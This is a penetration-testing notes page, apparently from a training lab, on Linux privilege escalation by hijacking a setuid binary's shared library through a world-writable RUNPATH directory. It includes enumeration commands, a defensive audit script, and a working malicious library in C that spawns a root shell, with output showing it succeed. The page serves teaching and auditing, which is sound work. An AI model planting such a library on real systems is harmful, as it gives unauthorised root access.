# Shared Object Hijacking

## Identification

```
find / -type f -perm -u=s 2>/dev/null | xargs ls -l
```


```shell-session
$ ls -la payroll

-rwsr-xr-x 1 root root 16728 Sep  1 22:05 payroll
```

### Print the shared objects required by a binary or shared object

```shell-session
$ ldd payroll

linux-vdso.so.1 =>  (0x00007ffcb3133000)
libshared.so => /lib/x86_64-linux-gnu/libshared.so (0x00007f7f62e51000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)
```

### Runpath

```shell-session
$ readelf -d payroll  | grep PATH

 0x000000000000001d (RUNPATH)            Library runpath: [/development]
```

```shell-session
$ ls -la /development/

total 8
drwxrwxrwx  2 root root 4096 Sep  1 22:06 ./
drwxr-xr-x 23 root root 4096 Sep  1 21:26 ../
```

```shell-session
$ cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
```

```shell-session
$ ldd payroll

linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)
```

Running `ldd` against the binary now lists the library's path as `/development/libshared.so`, which means the binary is vulnerable: the loader takes `libshared.so` from the world-writable RUNPATH directory.
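The condition identified above (a RUNPATH entry that other users can write to) can be checked across a whole host. The following is an added example, not part of the original page; the function names are hypothetical and it only inspects group/world write bits, not ownership:

```shell
# Added example, not from the original page: flag RUNPATH/RPATH directories
# that users other than the owner can write to.

# stdin: `readelf -d` output. stdout: one RUNPATH/RPATH entry per line.
runpath_dirs() {
    sed -nE 's/.*\((RUNPATH|RPATH)\).*\[(.*)\]/\2/p' | tr ':' '\n'
}

# Print the status of one entry: writable | missing | unresolved | ok
classify_dir() {
    case $1 in
        /*) ;;
        *) echo unresolved; return ;;  # $ORIGIN, relative or empty entry
    esac
    [ -d "$1" ] || { echo missing; return; }
    # -perm -0002 / -0020 match world- and group-writable directories
    if [ -n "$(find "$1" -maxdepth 0 \( -perm -0002 -o -perm -0020 \) 2>/dev/null)" ]; then
        echo writable
    else
        echo ok
    fi
}

# stdin: `readelf -d` output. Prints "<status> <entry>" per entry and
# returns 1 if any entry is not "ok".
check_runpath() {
    runpath_dirs | (
        rc=0
        while IFS= read -r d; do
            status=$(classify_dir "$d")
            printf '%s %s\n' "$status" "$d"
            [ "$status" = ok ] || rc=1
        done
        exit "$rc"
    )
}

# Check every setuid file under a root (default /). Requires readelf (binutils).
audit_setuid() {
    find "${1:-/}" -xdev -type f -perm -u=s 2>/dev/null | while IFS= read -r bin; do
        readelf -d "$bin" 2>/dev/null | check_runpath | while IFS= read -r line; do
            printf '%s: %s\n' "$bin" "$line"
        done
    done
    return 0
}
```

Source the file and run `audit_setuid /`; any line that is not `ok` for a root-owned setuid binary deserves review, and the fix is to tighten the directory's permissions or rebuild the binary without the RUNPATH.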

```shell-session
$ ./payroll 

./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
```

Compile a shared object that includes the missing function.

## Exploitation

```c
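#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */

/* Stands in for the dbquery symbol that payroll fails to resolve. */
void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
}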
```

```shell-session
$ gcc src.c -fPIC -shared -o /development/libshared.so
```

```shell-session
$ ./payroll 

***************Inlane Freight Employee Database***************

Malicious library loaded
# id
uid=0(root) gid=1000(mrb3n) groups=1000(mrb3n)
```

## Tool

<https://github.com/eblazquez/fakelib.sh>

## Resources

<https://www.boiteaklou.fr/Abusing-Shared-Libraries.html>

<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/shared-library-hijacking/>

<https://0xdf.gitlab.io/2019/02/02/htb-dab.html#privesc-genevieve--root>
